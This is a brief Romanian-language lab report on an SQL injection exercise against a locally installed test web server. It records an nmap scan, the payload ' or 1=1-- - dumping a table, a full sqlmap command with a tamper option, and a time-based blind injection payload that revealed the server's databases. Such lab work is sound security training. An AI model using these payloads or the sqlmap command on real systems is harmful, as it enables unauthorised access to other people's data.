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Laborator SQL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Am instalat un web server sql si am verificat ca sunt in aceeasi retea cu masina virtuala de pe care fac exploit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Am rulat un nmap pentru a vedea ce porturi avem deschise pe web server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29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Am accesat web serverul utilizand adresa IP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Folosirea acestui payload ‘or 1=1-- -‘ ne-a aratat tot tabelul cu date confidentiale.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Am instal sql Map pentru a folosi un tool de sql injection automat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21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Am scanat site-ul prin comanda python sqlmap.py -u "http://192.168.0.199/sqli/example1.php?name=root" --dbs --tamper=space2comment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413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fost gasit un blind sql injection cu acest payload name=root' AND (SELECT 9523 FROM (SELECT(SLEEP(5)))CJpA) AND 'RgOf'='RgOf  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00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Dupa utilizarea payload-ului, au fost gasit si bazele de date exercises si information_schema.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